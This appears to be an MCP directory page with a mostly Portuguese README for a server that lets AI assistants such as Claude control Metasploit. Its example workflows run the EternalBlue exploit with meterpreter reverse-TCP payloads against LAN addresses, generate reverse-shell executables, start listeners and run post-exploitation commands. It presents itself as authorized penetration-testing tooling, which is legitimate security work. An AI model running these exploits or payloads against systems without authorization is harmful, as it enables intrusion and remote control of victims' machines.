Metasploit MCP Server
Provides integration with the Metasploit Framework, enabling natural language control of exploit modules, payload generation, session management, and post-exploitation tasks.
Click on "Install Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@Metasploit MCP Serverrun ms17-010 exploit against 192.168.1.100"
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
Servidor MCP Metasploit
Um servidor MCP (Model Context Protocol) para integração com o Metasploit Framework no Kali Linux.
Demonstração
https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1
Exemplo de uso do Metasploit MCP com Claude Desktop
Related MCP server: Metasploit MCP Server
Descrição
Este servidor MCP fornece uma ponte entre modelos de linguagem grandes como o Claude e a plataforma de teste de penetração Metasploit Framework. Permite que assistentes de IA acessem e controlem dinamicamente as funcionalidades do Metasploit através de ferramentas padronizadas, habilitando uma interface de linguagem natural para fluxos de trabalho complexos de testes de segurança.
Funcionalidades
Informações de Módulos
list_exploits: Buscar e listar módulos de exploit disponíveis do Metasploit
list_payloads: Buscar e listar módulos de payload disponíveis com filtragem opcional por plataforma e arquitetura
Fluxo de Exploração
run_exploit: Configurar e executar um exploit contra um alvo com opções para executar verificações primeiro
run_auxiliary_module: Executar qualquer módulo auxiliar do Metasploit com opções personalizadas
run_post_module: Executar módulos pós-exploração contra sessões existentes
Geração de Payloads
generate_payload: Gerar arquivos de payload usando RPC do Metasploit (salva arquivos localmente)
Gerenciamento de Sessões
list_active_sessions: Mostrar sessões atuais do Metasploit com informações detalhadas
send_session_command: Executar um comando em uma sessão shell ou Meterpreter ativa
terminate_session: Finalizar forçadamente uma sessão ativa
Gerenciamento de Handlers
list_listeners: Mostrar todos os handlers ativos e jobs em background
start_listener: Criar um novo multi/handler para receber conexões
stop_job: Terminar qualquer job ou handler em execução
Pré-requisitos
Sistema Operacional: Kali Linux 2023.1+ (ou Debian/Ubuntu)
Metasploit Framework: Versão 6.0+
Python: 3.10 ou superior
Dependências: Pacotes Python necessários (veja requirements.txt)
Instalação no Kali Linux
1. Atualizar Sistema
sudo apt update && sudo apt upgrade -y2. Verificar Metasploit
# Verificar se Metasploit está instalado
msfconsole --version
# Se não estiver instalado:
sudo apt install metasploit-framework3. Preparar Python
# Verificar Python
python3 --version
# Instalar dependências do sistema se necessário
sudo apt install python3 python3-pip python3-venv git4. Clonar e Configurar
# Clonar repositório
git clone https://github.com/seu-usuario/metasploit-mcp-server.git
cd metasploit-mcp-server
# Criar ambiente virtual
python3 -m venv venv
# Ativar ambiente virtual
source venv/bin/activate
# Instalar dependências
pip install -r requirements.txt5. Configurar Variáveis de Ambiente
# Criar arquivo .env (opcional)
cat > .env << EOF
MSF_PASSWORD=yourpassword
MSF_SERVER=127.0.0.1
MSF_PORT=55553
MSF_SSL=false
PAYLOAD_SAVE_DIR=/home/kali/payloads
EOF
# Ou exportar diretamente
export MSF_PASSWORD=yourpassword
export PAYLOAD_SAVE_DIR=/home/kali/payloadsConfiguração do Metasploit RPC
Iniciar msfrpcd
# Terminal 1 - Iniciar o daemon RPC (deixe rodando)
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553
# Verificar se está rodando
ps aux | grep msfrpcd
netstat -tlnp | grep 55553Testar Conexão
# Testar conexão manual
telnet 127.0.0.1 55553
# Ou usando curl
curl -X POST http://127.0.0.1:55553/api/ \
-H "Content-Type: application/json" \
-d '{"method":"auth.login","params":["yourpassword"]}'Uso do Servidor MCP
Opções de Transporte
O servidor suporta dois métodos de transporte:
HTTP/SSE (Server-Sent Events) - Padrão para interoperabilidade:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085STDIO (Standard Input/Output) - Para Claude Desktop:
python MetasploitMCP.py --transport stdioIntegração com Claude Desktop (Kali Linux)
Editar arquivo de configuração:
nano ~/.config/Claude/claude_desktop_config.jsonConfiguração para Kali Linux:
{
"mcpServers": {
"metasploit": {
"command": "/home/kali/metasploit-mcp-server/venv/bin/python",
"args": ["/home/kali/metasploit-mcp-server/MetasploitMCP.py", "--transport", "stdio"],
"env": {
"MSF_PASSWORD": "yourpassword"
}
}
}
}Para Outros Clientes MCP
Iniciar em modo HTTP:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085Endpoint SSE: http://your-kali-ip:8085/sse
Considerações de Segurança
⚠️ AVISO IMPORTANTE DE SEGURANÇA
Esta ferramenta fornece acesso direto às capacidades do Metasploit Framework, que incluem recursos poderosos de exploração. Use com responsabilidade e apenas em ambientes onde você tem permissão explícita para realizar testes de segurança.
Boas Práticas
Autorização: Sempre valide e revise todos os comandos antes da execução
Ambiente: Execute apenas em ambientes de teste segregados ou com autorização adequada
Impacto: Esteja ciente de que comandos pós-exploração podem resultar em modificações significativas do sistema
Rede: Use apenas em redes isoladas ou de laboratório
Logs: Mantenha logs detalhados de todas as atividades
Exemplos de Uso com Claude Desktop
Comandos em Linguagem Natural
"Liste exploits relacionados ao SMB"
"Execute o exploit MS17-010 contra o host 192.168.1.100"
"Mostre as sessões ativas"
"Execute o comando 'whoami' na sessão 1"
"Gere um payload reverse TCP para Windows x64"
"Inicie um listener na porta 4444"Fluxo Completo de Pentesting
"Busque exploits para Windows SMB e execute contra 192.168.1.50 usando um payload meterpreter reverse TCP no meu IP 192.168.1.10 porta 4444"
"Liste as sessões ativas e execute 'getuid' na primeira sessão"
"Execute o módulo de enumeração de usuários logados na sessão ativa"
"Gere um payload executável Windows x64 com LHOST 192.168.1.10 e LPORT 5555"Exemplos de Fluxos de Trabalho
Exploração Básica
Descoberta:
list_exploits("ms17_010")Exploração:
run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})Verificação:
list_active_sessions()Execução:
send_session_command(1, "whoami")
Pós-Exploração
Enumeração:
run_post_module("windows/gather/enum_logged_on_users", 1)Comandos:
send_session_command(1, "sysinfo")Limpeza:
terminate_session(1)
Gerenciamento de Handler
Listener:
start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)Verificação:
list_listeners()Payload:
generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})Parar:
stop_job(1)
Testes
Instalação de Dependências de Teste
# Ativar ambiente virtual
source venv/bin/activate
# Instalar dependências de teste
pip install -r requirements-test.txt
# Ou usar instalador
python run_tests.py --install-depsExecutar Testes
# Todos os testes
python run_tests.py --all
# Com cobertura
python run_tests.py --all --coverage
# Testes específicos
python run_tests.py --unit
python run_tests.py --integrationEstrutura de Testes
tests/test_options_parsing.py- Testes de parsing de opçõestests/test_helpers.py- Testes de funções auxiliarestests/test_tools_integration.py- Testes de integração MCPconftest.py- Configuração de fixturespytest.ini- Configuração do pytest
Configuração Avançada
Diretório de Payloads
Personalizar localização dos payloads:
# Variável temporária
export PAYLOAD_SAVE_DIR=/home/kali/custom-payloads
# Permanente no .bashrc
echo 'export PAYLOAD_SAVE_DIR=/home/kali/custom-payloads' >> ~/.bashrc
source ~/.bashrc
# Criar diretório com permissões
mkdir -p /home/kali/custom-payloads
chmod 755 /home/kali/custom-payloadsConfiguração de Rede
Para acesso remoto ao MCP:
# Permitir conexões externas
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
# Configurar firewall se necessário
sudo ufw allow 8085Solução de Problemas
msfrpcd não inicia
# Verificar porta em uso
sudo netstat -tlnp | grep 55553
# Matar processo existente
sudo pkill msfrpcd
# Iniciar novamente
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553Erro de conexão
# Verificar serviço
ps aux | grep msfrpcd
# Verificar logs
tail -f ~/.msf4/logs/framework.log
# Testar conectividade
telnet 127.0.0.1 55553Permissões de arquivo
# Corrigir permissões do diretório de payloads
chmod 755 ~/payloads
# Corrigir permissões do projeto
chmod +x MetasploitMCP.pyProblemas com Claude Desktop
# Verificar configuração
cat ~/.config/Claude/claude_desktop_config.json
# Verificar logs do Claude Desktop
tail -f ~/.config/Claude/logs/main.log
# Testar servidor manualmente
python MetasploitMCP.py --transport stdioCompatibilidade
Metasploit Framework: 6.0+
Kali Linux: 2023.1+
Debian/Ubuntu: 20.04+
Python: 3.10+
Claude Desktop: Versões com suporte MCP
Contribuindo
Faça fork do projeto
Crie uma branch para sua feature:
git checkout -b feature/nova-funcionalidadeCommit suas mudanças:
git commit -am 'Adiciona nova funcionalidade'Push para a branch:
git push origin feature/nova-funcionalidadeAbra um Pull Request
Recursos Adicionais
Scripts Úteis
Criar script de inicialização:
cat > start_metasploit_mcp.sh << 'EOF'
#!/bin/bash
# Script para iniciar Metasploit MCP
# Iniciar msfrpcd
echo "Iniciando msfrpcd..."
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553 &
# Aguardar inicialização
sleep 5
# Ativar ambiente virtual e iniciar MCP
cd /home/kali/metasploit-mcp-server
source venv/bin/activate
python MetasploitMCP.py --transport stdio
echo "Metasploit MCP iniciado!"
EOF
chmod +x start_metasploit_mcp.shLogs e Monitoramento
# Monitorar logs do Metasploit
tail -f ~/.msf4/logs/framework.log
# Monitorar processos
watch 'ps aux | grep -E "(msfrpcd|MetasploitMCP)"'
# Verificar conexões
watch 'netstat -tlnp | grep 55553'Licença
Apache 2.0
Links Relacionados
Suporte
Para relatar bugs ou solicitar recursos:
Abra uma issue
Entre em contato via discussions
⚠️ Lembre-se: Use esta ferramenta apenas em ambientes autorizados para testes de penetração!
This server cannot be installed
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Latest Blog Posts
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/coliovacruz/Metasploit-MCP-Server'
If you have feedback or need assistance with the MCP directory API, please join our Discord server